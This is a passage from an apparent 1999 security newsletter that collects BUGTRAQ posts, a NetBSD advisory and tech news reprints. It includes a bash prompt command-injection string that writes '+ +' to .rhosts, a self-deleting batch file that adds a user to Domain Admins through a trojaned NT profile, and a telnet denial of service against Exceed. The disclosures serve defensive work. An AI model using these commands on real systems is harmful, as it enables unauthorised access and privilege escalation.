Subject: Re: Bash Bug
> On Tue, 20 Apr 1999, Shadow wrote:
>
> > mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
>
> Bash 1.x screws up during PS1 substitution (\w, \W). Bash 2.x does not
> seem to be vulnerable. Anyway, there's a hope even for those who want to
> stick to 1.x: replace \w with $PWD, \W with ${PWD##*/} (no guarantee).
This is correct; the bug was fixed in bash-2.0, which was released in
December, 1996. If you're still running 1.14.x, or earlier versions,
you should upgrade to bash-2.03.
--
``The lyf so short, the craft so long to lerne.'' - Chaucer
( ``Discere est Dolere'' -- chet)
Chet Ramey, Case Western Reserve University Internet: chet@po.CWRU.Edu
----------------------------------------------------------------------------
Date: Fri, 23 Apr 1999 11:25:58 +0100
From: Ph. Rueegsegger <philip.rueegsegger@BRUKER.CH>
To: BUGTRAQ@netspace.org
Subject: Re: Bash Bug
Date sent: Thu, 22 Apr 1999 01:39:48 +0100
Send reply to: Andy Church <achurch@DRAGONFIRE.NET>
>From: Andy Church <achurch@DRAGONFIRE.NET>
Subject: Re: Bash Bug
Originally to: shadow@OPERATOR.ORG
To: BUGTRAQ@netspace.org
Hello together
> >Figured while everyone was working with bash, I might as well
make this
> >one public(I apologize if this is old news, apparently it hasnt been fixed
> >if so).
> >
> >If a user creates a directory with a command like
> >
> >mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
Not bad !
> >
> >and someone cd's into said directory, either by accident, or whatever,
> >then it will cause it to actually execute.
>
> Just to clarify, this only happens if PS1 (the bash prompt) contains
> \w or \W _and_ a prompt is displayed containing the bogus directory name.
> This means unattended shell scripts are safe. As a workaround, use `pwd`
> in place of \w.
Sorry, with bash version 2.01.1 (supplied with SuSE5.3) is just the
opposite of what you are clarifying. If one has \w or \W specified in
PS1 to show the path, it does NOT happen and if `pwd` is specified
instead of \w or \W it DOES happen.
>
> Tested with bash 1.14 (it's the only one I have handy).
>
> --Andy Church
> achurch@dragonfire.net
> http://achurch.dragonfire.net/
Kind regards
Phibus
-----------------------------------------------------------
Philip Rueegsegger
System Manager
Bruker AG Direct dial : +41-1-825 93 46
Industriestrasse 26 Telephone : +41-1-825 91 11
CH-8117 Faellanden Telefax : +41-1-825 94 69
Switzerland E-Mail : philip.rueegsegger@bruker.ch
-----------------------------------------------------------
----------------------------------------------------------------------------
Date: Tue, 27 Apr 1999 16:38:15 +0200
From: Peter J. Holzer <hjp@WSR.AC.AT>
To: BUGTRAQ@netspace.org
Subject: Re: Buffer overflow in BASH
On 1999-04-19 14:59:06 -0400, Adam D. McKenna wrote:
> I really don't see the point of people posting bash bugs here.
> Especially not bugs in old versions. There are a lot of bash bugs, you
> can't gain any extra priveleges by exploiting them though.
You can, if you can trigger the bug in a script which is not running
with your privileges - suid and cgi scripts are obvious examples.
So, posting bash bug reports at least reminds people that using
bash - especially old versions - for such scripts is not a good idea.
hp
--
_ | Peter J. Holzer | Where do you want your keys
|_|_) | Sysadmin WSR / Obmann LUGA | to go today?
| | | hjp@wsr.ac.at | -- Tom Perrine <tep@SDSC.EDU>
__/ | http://wsrx.wsr.ac.at/~hjp/ | on bugtraq 1999-04-20
@HWA
32.0 NetBSD Security Advisory 1999-009
Date: Wed, 21 Apr 1999 11:19:23 +1000
From: matthew green <mrg@ETERNA.COM.AU>
To: BUGTRAQ@netspace.org
Subject: NetBSD Security Advisory 1999-009
-----BEGIN PGP SIGNED MESSAGE-----
NetBSD Security Advisory 1999-009
=================================
Topic: SVR4 compatibility device creation vulnerability
Version: NetBSD 1.3.3 and prior; NetBSD-current until 19990420
Severity: Local users can access and modify any data on first IDE disk
Abstract
========
In order to provide a system environment capable of executing System V
Release 4 (`SVR4') binaries, it is necessary to create a set of device
special files; to simplify this task, a shell script is shipped with
the system. Due to a mismatch of device major numbers between NetBSD
platforms, one device special file is erroneously created with a wrong
major number, which may allow a regular user to arbitrarily read or
write any data stored on the NetBSD portion of the first IDE disk
configured by the system.
This vulnerability is restricted to the i386 port of NetBSD with SVR4
emulation additionally configured only.
Technical Details
=================
The SVR4 /dev/wabi character device special file, usually created
below the /emul/svr4 hierarchy, is currently supposed to be a synonym
for the /dev/null device special file.
Originally developed on the sparc port of NetBSD, the SVR4_MAKEDEV
shell script creates this file with a major number of 3 and a minor
number of 2, setting these properties equivalent to those of the
/dev/null device special file on that platform. On the i386 port of
NetBSD, the character device major number 3 is associated with the
wd(4) driver, which supports IDE (and compatible) disks, and whose
minor number 2 denotes the NetBSD portion of the first such disk
configured by the systems; this corresponds to the special device file
/dev/rwd0c in the base distribution. As the /dev/wabi special device
file is created with world read and write permissions, a regular user
may read and write any data stored on that portion of the disk.
The effects of actually running the WABI software on a vulnerable system
have not been investigated.
Solutions and Workarounds
=========================
A patch is available for the NetBSD 1.3.3 which makes the SVR4_MAKEDEV
shell script create the wabi device special file with the correct
properties. You may find this patch on the NetBSD ftp server:
ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/patches/19990419-SVR4_MAKEDEV
NetBSD-current since 19990420 is not vulnerable. Users of
NetBSD-current should upgrade to a source tree later than 19990420.
Once the SVR4_MAKEDEV script is updated, re-run it to recreate the
wabi device with the correct parameters.
If this action cannot be taken, an immediate workaround is to remove
the existing device special file and creating a new one, which can be
done by executing the following shell command sequence as the super-user:
# /bin/rm -f /emul/svr4/dev/wabi
# /sbin/mknod /emul/svr4/dev/wabi c 2 2
# /bin/chmod u=rw,g=rw,o=rw /emul/svr4/dev/wabi
Thanks To
=========
The vulnerability was discovered by Klaus Klein <kleink@ira.uka.de>,
who also provided the solution and authored this advisory.
Revision History
================
1999/04/17 - initial version
1999/04/19 - dates were incorrect
More Information
================
Information about NetBSD and NetBSD security can be found at
http://www.NetBSD.ORG/ and http://www.NetBSD.ORG/Security/.
Copyright 1999, The NetBSD Foundation, Inc. All Rights Reserved.
$NetBSD: NetBSD-SA1999-009.txt,v 1.2 1999/04/19 15:07:52 mrg Exp $
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv
iQCVAwUBNxwkvz5Ru2/4N2IFAQEbuQQAtv2ho3MWYYihmZBagGnX6Wd0KD+mTIh0
liV32yx46kVELmCGrS4pEQh3fBNNgYkYBjympKrC/Iy1Vj9DMAMBNLGedFu10yXT
oJnKLcmNmjEE8qRnqwjBRUIn/kURvG6wakgC9n6OuCOIcdtYeiUmgFhoPyl4lzKf
FRpxHkqZnLo=
=9Ypx
-----END PGP SIGNATURE-----
@HWA
33.0 Explorer favicon.ico bug introduces new vulnerabilties
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 16 Apr 1999 22:11:22 -0700
From: "Robert David Graham" <rob@netice.com>
Subject: favicon.ico
In case you haven't heard, Microsoft has a new feature in IE 5.0 web
browser. When you add a website to you "Favorites" (aka. Bookmarks for you
Netscape users), the browser attempts to download a graphic called
"favicon.ico", then show that icon along with the title of the webpage.
This has two risks.
First of all, the website owner is notified when you the page to your
favorites, revealing information about yourself. A discussion of this can be
found at http://msdn.microsoft.com/workshop/essentials/versions/ICPIE5.asp
This privacy risk is probably minor, but I've seen several press articles on
the subject.
The second RISK is much more severe. Go to AltaVista (or any search engine)
and search for "favicon.ico". You now have a list of 500 websites that
expose their access logs. In the logs, you can find several websites that
expose the URLs of CGI scripts, including passwords. Through manual
searching, I found 2 sites that exposed logon information; I'm sure I can
write a program that would scan those logs to look for CGI programs and get
even more. This also exposes even more privacy information because these
logs often contain the Referer field as well.
This isn't unique to "favicon.ico". The RISK is really:
* people are unintentionally exposing access logs on their web sites,
exposing user information and possible passwords.
* hackers can easily find vulnerable systems not by scanning the site itself
(which can be detected by intrusion detection systems), but by searching a
3rd party like AltaVista.
Robert Graham
CTO, Network ICE
http://www.networkice.com/advice
@HWA
34.0 Lets hear it for CERT the good guys!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
via HNN http://www,hackernews.com/
CERT the Good Guys?
contributed by turtlex
Obviously written by someone who didn't even bother
looking for an opposing viewpoint this ABC News article
praises CERT for all the good work that they have done.
While CERT does try lets not forget that they are in bed
with the vendors are usually several months late with
advisories. This article ignores all of that and labels
them as "the users last hope".
ABC News;
http://abcnews.go.com/sections/tech/DailyNews/cert990422.html
The Internet�s Men in Black
CERT Serves and Protects Netizens
By Michael J. Martinez
ABCNEWS.com
April 24 In November 1988, a student at Cornell University unleashed a worm, or self-replicating computer
program, upon the nascent Internet. The worm invaded the academic computers that hosted the Net, hogging
all of their processing power. Though the worm invaded fewer than 5 percent of the host computers, the
entire system was shut down for days while an ad hoc team of academics struggled to eject it. Officials at
the U.S. Defense Department, which sponsored the original ARPANET and its evolution to the Internet, quickly
decided that coordinated efforts were needed to combat such invasions. Thus was born the Computer Emergency
Response Team Coordination Center (CERT/CC, commonly known as CERT).
In the 10 years since, the 15-member CERT, hosted by the Software Engineering Institute at Carnegie Mellon
University, has become the de facto defender of the Internet, helping users around the world protect themselves
from all sorts of computer menaces.
Users� Last Hope
Many corporations, government agencies and universities now have their own computer emergency response teams.
CERT was the first, and it still has the broadest charter of any such team: protect the Internet.
We�re kind of the last hope for a lot of people, says Jeff Carpenter, head of the incident response team at
CERT. When administrators can�t figure out what�s going on, they call us.
CERT gets dozens of phone calls and e-mails every day from system administrators (sysadmins, in the industry
jargon) around the world, describing virus infestations, minor system infiltrations and widespread attacks by
malicious hackers. We�ve seen almost everything, Carpenter says. A very small percentage of what we receive are
reports of new problems. There�s very little out there that really surprises us.
The Melissa virus, which made global headlines in late March, was nothing new to CERT except for the fact
that it spread faster than nearly anything else seen before. The CERT team put out an advisory on Melissa within
days of its release, after a marathon overnight analysis session. The virus appeared on a Friday; the advisory was
posted on the CERT Web site early Saturday morning.
In Melissa�s case, we put out the alert because we knew it would become far worse without that kind of
awareness, Carpenter says. We knew that people would come in on Monday and if they weren�t warned, they�d
start spreading it even further.
Advisers, Not Policemen
One of the common misconceptions about CERT is that it exists to catch malicious hackers and virus writers. But
CERT is not a law enforcement agency. Instead, the center focuses on responding quickly to specific attacks and to
potential vulnerabilities, and making sure they don�t happen again.
The center is divided into two teams: the incident response team and the vulnerability assessment team. While
the incident response team helps system administrators recover from a hacking or virus incident, the vulnerability
assessment team responds to inquiries about inherent software problems.
These problems don�t come in from security researchers or anything like that, says Shawn Hernan, who
heads the vulnerability team. These are from sysadmins who are probably using their software in ways that the
vendor might not have considered.
Preventive Measures
So far this year, there have been only four major CERT advisories. Besides the Melissa virus, two spelled out new
tricks in the placement of Trojan horse programs (applets that appear harmless, but release viruses or hacking tools
once activated). The fourth dealt with a variation on an old way to sneak programming code into a server.
The rest of the time, CERT team members advise system administrators and software vendors on the best
ways to protect themselves.
You would really be amazed at how many people just don�t take the time to download the patches they need from
their software and anti-virus vendors, Carpenter says. We always tell them to make sure that every single patch is
installed. Otherwise it�s fairly easy for an intruder to gain access.
CERT is really invaluable, says Motoaki Yumamura, an anti-virus researcher at Symantec Corp. They give us a
lot of great information, which we can translate into products to help our customers.
For CERT researchers, however, the responsibilities and rewards go beyond commercial concerns.
The Internet is the best opportunity for new and exciting societal changes says Hernan. To work in an
organization like CERT is to have a positive effect on the Internet.
@HWA
35.0 NASA finds scapegoat? - Programmer indicted
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www,hackernews.com/ April 29th
NASA Finds Scapegoat?
contributed by Dave Merritt
After notifying NASA of several serious security holes, of
which anyone with a login account could access, NASA
chose to cover it up and make a scapegoat out of the
individual. This news article has twisted the story to
make it seem that Dave Merritt had malicious intentions
while he claims he was trying to help by pointing out
possible vulnerabilities. Mr. Merritt is seeking legal
representation. If anyone can help please contact us
here. (Why is a case against NASA being prosecuted by
a County DA, doesn't the fact that it is NASA make it a
federal crime?)
Houston Chronicle
http://www.chron.com/cgi-bin/auth/story.mpl/content/interactive/space/news/99/990427.html
April 26, 1999, 08:39 p.m.
Programmer who allegedly broke into NASA computers is
indicted
By STEVE BREWER
Copyright 1999 Houston Chronicle
A programmer who once wrote software for the international space station was indicted Monday on
accusations that he took a code-breaking program off the Internet and used it to explore NASA
computers.
David Merritt, 41, was charged with breach of computer security, said Assistant Harris County District
Attorney Terry Jennings. Bail was set at $2,000, and Merritt was scheduled to turn himself into
authorities.
Jennings said no serious damage was done to NASA's computers and that Merritt only used the illegal
access to explore parts of the system he couldn't normally get into.
But, Jennings said, NASA spent $19,000 in man-hours to investigate the problem and ensure Merritt
hadn't caused any permanent harm. In such cases, the prosecutor added, those expenditures are counted
as criminal damages.
Lance Carrington, NASA's acting assistant inspector general in Washington D.C., told the Chronicle
Monday that much of the effort in these inquires is usually spent ensuring that no one can access the
computers the same way again.
Carrington's office conducted the initial investigation into Merritt's case.
Jennings said the hacking occurred between May 14 and 18 at NASA's Sonny Carter Training Facility,
where Merritt was working on the space station project. He worked for Geo Control Systems, a Clear
Lake company, which was a subcontractor to Boeing, NASA's prime contractor on the project.
For his job, Merritt had limited access to the system used to write software, but somehow he got
encrypted passwords of other users and downloaded them to his desktop, Jennings said. He then used an
Internet password-cracking tool called "John the Ripper" to decipher them.
Armed with the passwords, Merritt then accessed other parts of the NASA computer system, Jennings
said, then later told a supervisor he had "found" the passwords.
A Geo Control Systems employee fielding questions on the case would only identify himself by his first
name when contacted by the Chronicle Monday. Other than to say that Merritt no longer worked for the
company, he said he would only comment on the case if the name of the company was not published.
Carrington said Merritt's case is relatively minor. But he said the fact that code-breaking technology is
easily available on the Internet concerns government agencies that depend on high-tech computers.
"Because of the climate today with the evolving technology, we're overly sensitive to it. It's very
disconcerting that this information is out there," Carrington said. "It makes life tough that you've got to
deal with people like that -- people who know their stuff and amateurs who can get this information
that's becoming more user-friendly.
Carrington said NASA has handled several high-profile cases in which hackers have breached agency
systems. NASA has begun hiring experts who once worked for the military and the National Security
Agency to investigate those kinds of cases.
The near six-year task of assembling the space station began last year. It's not staffed at this point. The
project is led by the United States, and its partners include Russia, Europe, Japan and Canada.
The charge against Merritt is a state jail felony, punishable by up to two years in jail and up to a $10,000
fine.
Chronicle reporter Mark Carreau contributed to this story.
@HWA
36.0 CIH author found?
~~~~~~~~~~~~~~~~~
CIH Author Identified?
From HNN http://www.hackernews.com/ April 29th
contributed by mdef
The Tatung Institute of Technology claims that it has
found the author of the CIH or Chernobyl virus. They
claim that they had punished Chen Ing-hau last April
when the virus he wrote as a student began to cause
damage in an inter-college data system, according to
Lee Chee-chen, the institute's dean of student affairs.
Chen Ing-hau has since graduated and is currently
serving his compulsory two year stint in the Taiwanese
military.
CNN
http://www.cnn.com/TECH/computing/9904/29/computer.virus.ap/index.html
Nando Times
http://www.techserver.com/story/body/0,1634,43487-70127-507733-0,00.html
CNN;
Taiwan college identifies computer virus author
April 29, 1999
Web posted at: 9:32 a.m. EDT (1332 GMT)
TAIPEI, Taiwan (AP) -- A former computer engineering student was
identified by his college today as the author of the Chernobyl virus -- the
menace that caused hundreds of thousands of computer meltdowns around the world this week.
The Tatung Institute of Technology had punished Chen Ing-hau last April
when the virus he wrote as a student began to cause damage in an
inter-college data system, according to Lee Chee-chen, the institute's dean of
student affairs.
Chen, who was a senior at the time, was given a demerit but not expelled.
The Chernobyl virus is known in Taiwan as the CIH, using Chen's initials.
The college did not mete out a more severe punishment because Chen had
warned fellow students not to spread the virus, Lee said. Chen did not come
up with an anti-virus program, Lee said.
Lee said he was not sure how the virus ended up causing so much destruction
a year later.
Chen graduated from the college last summer and now is serving Taiwan's
two-year compulsory military service, Lee said. Officials of the Bureau of
Criminal Investigation said they would seek permission to question Chen.
The unusually destructive virus -- timed to strike on April 26, the 13th
anniversary of the Chernobyl nuclear disaster -- tries to erase a computer's
hard drive and write gibberish into its system settings to prevent the machine
from being restarted.
Turkey and South Korea each reported 300,000 computers damaged Monday,
and there were more elsewhere in Asia and the Middle East. Fewer than
10,000 of the 50 million computers in the United States were affected.
Copyright 1999 The Associated Press. All rights reserved.
@HWA
37.0 INTEL goes after Zero Knowledge Systems
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com April29th
Intel goes after Zero Knowledge
contributed by Carole
Zero Knowledge Systems has found a way to make the
PIII serial number, that had been hidden, visible without
the knowledge of the computer owner. Intel, using its
large corporate muscle has persuaded Symantec to
included the Zero Knowledge software as part of Norton
AntiVirus and have it flagged as malicious code. Now
when a Norton user visits the Zero Knowledge Web site
the AV detections software goes off. Intel and Zero
Knowledge are reportedly in discussions over this
matter.
C|Net http://www.news.com/News/Item/0,4,35834,00.html?st.ne.fd.tohhed.ni
ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2249416,00.html
Intel http://www.intel.com
Zero Knowledge Systems http://www.zks.net/
C|Net;
Intel still wrestling serial number debacle
By Reuters
Special to CNET News.com
April 29, 1999, 2:40 p.m. PT
URL: http://www.news.com/News/Item/0,4,35834,00.html
Intel, the world's leading chipmaker, is still grappling with a consumer-relations
problem that stems from its decision to embed a serial number in its Pentium III micro
chips, according to reports.
Intel in January reacted quickly to complaints from privacy advocates about the serial
numbers by distributing software that enabled owners of computers containing
Pentium III chips to hide the number.
But the problem has not gone away, the New York Times reported today. The newspaper
reported that a small Canadian software maker has found a way to make the serial number,
that has been hidden, visible without the knowledge of the computer owner.
The problem is not new. On March 10, Montreal-based Zero-Knowledge developed an ActiveX
control that retrieved the serial number under certain circumstances, even after a software
repair released by Intel disabled the feature and ostensibly "hid" the number from prying eyes.
Then, on March 19, antivirus software firm Symantec announced it would provide "detection and
elimination" of the Pentium III hack from Zero-Knowledge on its Web site for download. Symantec
also said it would be part of its regular weekly virus definitions.
The Times report, however, seems to indicate that a war of words has continued to linger over
the issue.
Intel has reacted by persuading Symantec to include the Zero-Knowledge program on its list of
malicious programs. Consequently, users who visit the Zero-Knowledge site get a warning that the
program is a virus.
Zero-Knowledge executives have said that Intel has unfairly portrayed it as outlaws, the newpaper
said.
The issue of the serial number has been a volatile one for Intel because privacy advocates have
said the serial number allows direct marketers and data-mining companies to track the patterns of
Web surfers. They also say it is a poor way to protect against theft, the initial purpose of the
serial number.
An Intel spokesman said the company has been discussing the vulnerability of the serial number
with Zero-Knowledge executives, the newspaper reported.
News.com's Michael Kanellos contributed to this report.
Story Copyright � 1999 Reuters Limited. All rights reserved.
@HWA
38.0 NT-Exceed DoS
~~~~~~~~~~~~~
Date: Tue, 27 Apr 1999 13:29:26 -0700
From: "LaFournaise, Chris J." <cjlafournaise@ESCOCORP.COM>
To: BUGTRAQ@netspace.org
Subject: NT/Exceed D.O.S.
This is regarding Hummingbird's Exceed X emulator v5 (and possibly v6)
running on Windows NT. I haven't tested Win95/98.
The Exceed X server allows inbound TCP connections on port 6000 from the XDM
host. If someone uses telnet from the XDM host to connect to a PC running
Exceed on port 6000 and enters any garbage text, the X server will hang and
the Exceed session is frozen for good.
I have notified Hummingbird via their tech support web site but have not
received a response yet.
Chris LaFournaise
cjlafournaise@escocorp.com
----------------------------------------------------------------------------
Date: Wed, 28 Apr 1999 23:34:26 +0100
From: Steve <steve@STANDAY.KEBLE.OX.AC.UK>
To: BUGTRAQ@netspace.org
Subject: Re: NT/Exceed D.O.S.
> This is regarding Hummingbird's Exceed X emulator v5 (and possibly v6)
> running on Windows NT. I haven't tested Win95/98.
>
> The Exceed X server allows inbound TCP connections on port 6000 from the XDM
> host. If someone uses telnet from the XDM host to connect to a PC running
> Exceed on port 6000 and enters any garbage text, the X server will hang and
> the Exceed session is frozen for good.
As far as I know, a variation of that bug has been present in all versions
>from the early Exceed for MS-Dos onwards. I stumbled on it 5 years ago when
I was a student, so I didn't know whether it was a configuration error or a
bug.
I don't think I managed to permanently freeze the connection then, but it
was certainly possible to freeze it for as long as you left the telnet
connection to port 6000 open. If I remember correctly, it didn't use to
be just the XDM host that could make the connection, you could freeze Exceed
>from any host. I guess that would depend on the setting of the 'Host Access
Control List' field.
For the record, I've just tested Exceed v6 under Windows 98 and it still has
the same effect. I also tested setting Exceed to only allow a given machine
to connect, and I can still freeze it by telnetting from another machine
in another subnet...
I didn't manage to freeze it beyond the telnet session to port 6000 though.
Steve.
----------------------------------------------------------------------------
Date: Thu, 29 Apr 1999 09:23:11 -0600
From: Max Norris <pedhrm.mnorris@STATE.UT.US>
To: BUGTRAQ@netspace.org
Subject: Re: NT/Exceed D.O.S.
I wasn't able to duplicate a mini-DOS running eXceed 6.0.2.0 on NT 4.0 SP4.
Steps:
On NT machine, opened xterm session
Went to box that I just opened the session with, type in TELNET <my_ip_addr> 6000
The eXceed program hung for about 2 minutes as the host tried to connect to it, but everything else still worked in NT.
After attempting to connect, it will say it is connected for about 2 seconds and then states "Connection closed by foreign
host".
After that the eXceed session resumed and I was able to close out gracefully.
Max Norris
pedhrm.mnorris@state.ut.us
>>> "LaFournaise, Chris J." <cjlafournaise@ESCOCORP.COM> 04/27 2:29 PM >>>
This is regarding Hummingbird's Exceed X emulator v5 (and possibly v6)
running on Windows NT. I haven't tested Win95/98.
The Exceed X server allows inbound TCP connections on port 6000 from the XDM
host. If someone uses telnet from the XDM host to connect to a PC running
Exceed on port 6000 and enters any garbage text, the X server will hang and
the Exceed session is frozen for good.
I have notified Hummingbird via their tech support web site but have not
received a response yet.
Chris LaFournaise
cjlafournaise@escocorp.com
----------------------------------------------------------------------------
Date: Wed, 28 Apr 1999 17:39:00 -0700
From: Ian Westcott <rakarra@PACBELL.NET>
To: BUGTRAQ@netspace.org
Subject: Re: NT/Exceed D.O.S.
On Tue, Apr 27, 1999 at 01:29:26PM -0700, LaFournaise, Chris J. wrote:
> This is regarding Hummingbird's Exceed X emulator v5 (and possibly v6)
> running on Windows NT. I haven't tested Win95/98.
>
> The Exceed X server allows inbound TCP connections on port 6000 from the XDM
> host. If someone uses telnet from the XDM host to connect to a PC running
> Exceed on port 6000 and enters any garbage text, the X server will hang and
> the Exceed session is frozen for good.
I just tested Exceed v6.0 under Win95, and it is vulnerable.
--
Ian Westcott | Fly away to a Rainbow in the sky.
ijwestcott@ucdavis.edu | Gold is at the end for each of us to find.
-==(UDIC)==- | There the road begins where another one will end.
Rakarra@FurryMUCK, IRC | Here the four winds know,
Dragon Code: DC.D f+ | Who will break and who will bend.
s- h- Cgold>Red a $ | All to be the Master of the Wind.
----------------------------------------------------------------------------
Date: Wed, 28 Apr 1999 13:57:51 -0700
From: Matt Wilbur <matt@PHOTON.COM>
To: BUGTRAQ@netspace.org
Subject: Re: NT/Exceed D.O.S.
Exceed (an X server, not an X emulator) version 6.0.1.0 on NT appears to
have fixed this problem, somewhat...
Telnetting to port 6000 locks the server up for 20-30 seconds, but it
recovers eventually. Not surprisingly, using netcat has the same effect...
although, contrary to Chris's findings with Exceed 5, I didn't need to send
any garbage characters, the connection alone did the job. Also, it works
>from any host, not just the one the xdm session had been initiated with,
regardless of host access settings in Xconfig, Exceeds "configuration" tool.
I'd still consider this DoS-bait, when you imagine a one-liner to
continuously connect to port 6000 of your favorite Exceed user's machine.
Matt Wilbur
[snip]
>
> This is regarding Hummingbird's Exceed X emulator v5 (and possibly v6)
> running on Windows NT. I haven't tested Win95/98.
>
> The Exceed X server allows inbound TCP connections on port
> 6000 from the XDM> host. If someone uses telnet from the XDM host to
connect to
> a PC running Exceed on port 6000 and enters any garbage text, the X server
> will hang and the Exceed session is frozen for good.
>
> I have notified Hummingbird via their tech support web site
> but have not received a response yet.
>
> Chris LaFournaise
> cjlafournaise@escocorp.com
>
----------------------------------------------------------------------------
Date: Thu, 29 Apr 1999 11:54:14 -0700
From: Jamie Lawrence <jal@THIRDAGE.COM>
To: BUGTRAQ@netspace.org
Subject: Re: NT/Exceed D.O.S.
I couldn't reproduce either effect with Exceed 6.1 under NTsp3.
Everything behaved normally, both for new and existing sessions.
-j
@HWA
39.0 NT4 Trojaned Profiles
~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 28 Apr 1999 20:36:58 +0100
From: Mnemonix <mnemonix@GLOBALNET.CO.UK>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry
Problem : NT users can cause other users of the system to load a "trojaned" profile that could lead to a system compromise. This
issue has been here for as long as NT 4 has, but I'm not sure if anybody has picked this particular issue up.
Details: When a user logs onto an NT Workstation or Server a new subkey is written to the HKLM\Software\Microsoft\Windows
NT\CurrentVersion\ProfileList registry key. The name of this new key is that of the user's Security Identifier or SID. One of
the values of this key is the ProfileImagePath which points to the location of the user's profile directory. This can reference
a local path (eg %systemroot%\profiles\acc_name) or a UNC path (eg \\PDC\profiles\acc_name).
By default, the permissions on the ProfileList registry key grants the Everybody group the SetValue permission meaning that any
user including guests may edit the information in this subkey and all of its subkeys. Consequently a malicious user of the
system could change another user's ProfileImagePath and get it to load a different profile (eg c:\trojaned-profile) that
contains entries in the Start Up folder that will run when that user next logs on to that system.
Editing these Registry keys can be done local or from across the network. Although remote access to the registry can be
controlled by placing controls on the winreg key, the HKLM\Software\Microsoft\Windows NT\CurrentVersion path into the Registry
is, by default, an AllowedPath, meaning that, irrespective of the ACLs set on the winreg key, a remote user may edit any subkey
under the CurrentVersion key. Note that tools such as Regedit.exe and Regedt32.exe will not be able to be used to to this. The
NT Resource Kit's reg.exe could though because it opens a handle straight to the Registry key in question.
Attack Scenario: This weakness of default settings, could allow a normal domain user to gain domain Administrative rights:
Assuming the attackers machine is called \\DODGY and the PDC is called \\PDC , the user jsmith at \\DODGY creates a new
directory on the root of their C: drive and call it "profile" and copy into it the contents of their own profile and then make
some changes like creating a batch file called addme.bat with the following contents:
net groups "Domain Admins" jsmith /add
del "\\DODGY\C$\profile\start menu\programs\startup\addme.bat"
Once they have logged onto the domain they use reg.exe to open the Administrator's ProfileList key. This is easily found as it
is the SID with a RID of 500. They then edit the ProfileImagePath to point to \\DODGY\C$\profile . Next time the Administrator
logs on at the \\PDC console their profile will be loaded from \\DODGY (because Domain Admins are members of the local
Administrators group they can map to the administrative share on \\DODGY ) and the self deleteing batch file in the StartUp wil
be run adding jsmith to the Domain Admins group.
This whole process can be cleaned up somewhat as in most cases it would be fairly obvious that something is not as it should be
to the Administrator when they log on.
Resolution: The winlogon.exe process actually creates the new subkey when a user logs on - and the key is _not_ created in the
security context of the user currently logging on but rather the SYSTEM account. Only the SYSTEM account, then, needs write
access to the ProfileList key and Everyone else should be given only Read Access. Doing this will not prevent new users from
logging on and they "SID" subkey is still created.
NB:- This issue can also allow users to bypass mandatory profiles etc, etc.
Cheers,
David Litchfield
http://www.infowar.co.uk/mnemonix
http://www.arca.com/
-------------------------------------------------------------------------------------------
Date: Thu, 29 Apr 1999 09:58:35 -0700
From: Paul Leach <paulle@MICROSOFT.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry
> -----Original Message-----
> From: Mnemonix [mailto:mnemonix@GLOBALNET.CO.UK]
> Sent: Wednesday, April 28, 1999 12:37 PM
> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
> Subject: NT Security Advisory: Domain user to Domain Admin - Profiles
> and the Registry
>
>
> Problem : NT users can cause other users of the system to
> load a "trojaned" profile that could lead to a system
> compromise. This issue has been here for as long as NT 4 has,
> but I'm not sure if anybody has picked this particular issue up.
Yes, they have.
The "Securing Windows NT" Whitepaper from the www.microsoft.com (just use
the search capabiltiy for exactly the phrase in quotes) already notes that
you must ACL the ProfileList key as you suggest.
Paul
-------------------------------------------------------------------------------------------
Date: Thu, 29 Apr 1999 11:44:18 -0700
From: Paul Leach <paulle@MICROSOFT.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry
> -----Original Message-----
> From: Paul Leach [mailto:paulle@MICROSOFT.COM]
> Sent: Thursday, April 29, 1999 9:59 AM
> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
> Subject: Re: NT Security Advisory: Domain user to Domain Admin -
> Profiles and the Registry
>
>
> > -----Original Message-----
> > From: Mnemonix [mailto:mnemonix@GLOBALNET.CO.UK]
> > Sent: Wednesday, April 28, 1999 12:37 PM
> > To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
> > Subject: NT Security Advisory: Domain user to Domain Admin
> - Profiles
> > and the Registry
> >
> >
> > Problem : NT users can cause other users of the system to
> > load a "trojaned" profile that could lead to a system
> > compromise. This issue has been here for as long as NT 4 has,
> > but I'm not sure if anybody has picked this particular issue up.
>
> Yes, they have.
>
> The "Securing Windows NT" Whitepaper from the
> www.microsoft.com (just use
> the search capabiltiy for exactly the phrase in quotes)
> already notes that
> you must ACL the ProfileList key as you suggest.
I had mistemembered that the above search got exactly one hit -- instead, it
was the first hit on the list. The precise URL is
http://www.microsoft.com/NTServer/security/exec/overview/Secure_NTInstall.as
p
Also, the SCE templates included with SP4 were designed to help automate the
application of the recommendations in the White Paper. So if you want to
make the fix to the ACL on Profile list, I'd suggest looking into them.
Paul
-------------------------------------------------------------------------------------------
Date: Thu, 29 Apr 1999 11:31:23 -0700
From: David LeBlanc <dleblanc@MICROSOFT.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry
> From: Mnemonix [mailto:mnemonix@GLOBALNET.CO.UK]
> Problem : NT users can cause other users of the system to
> load a "trojaned" profile that could lead to a system
> compromise. This issue has been here for as long as NT 4 has,
> but I'm not sure if anybody has picked this particular issue up.
I think you should search the archives on my name with ProfileList as a key,
and that you will find a number of references. Dominique, Paul Leach and I
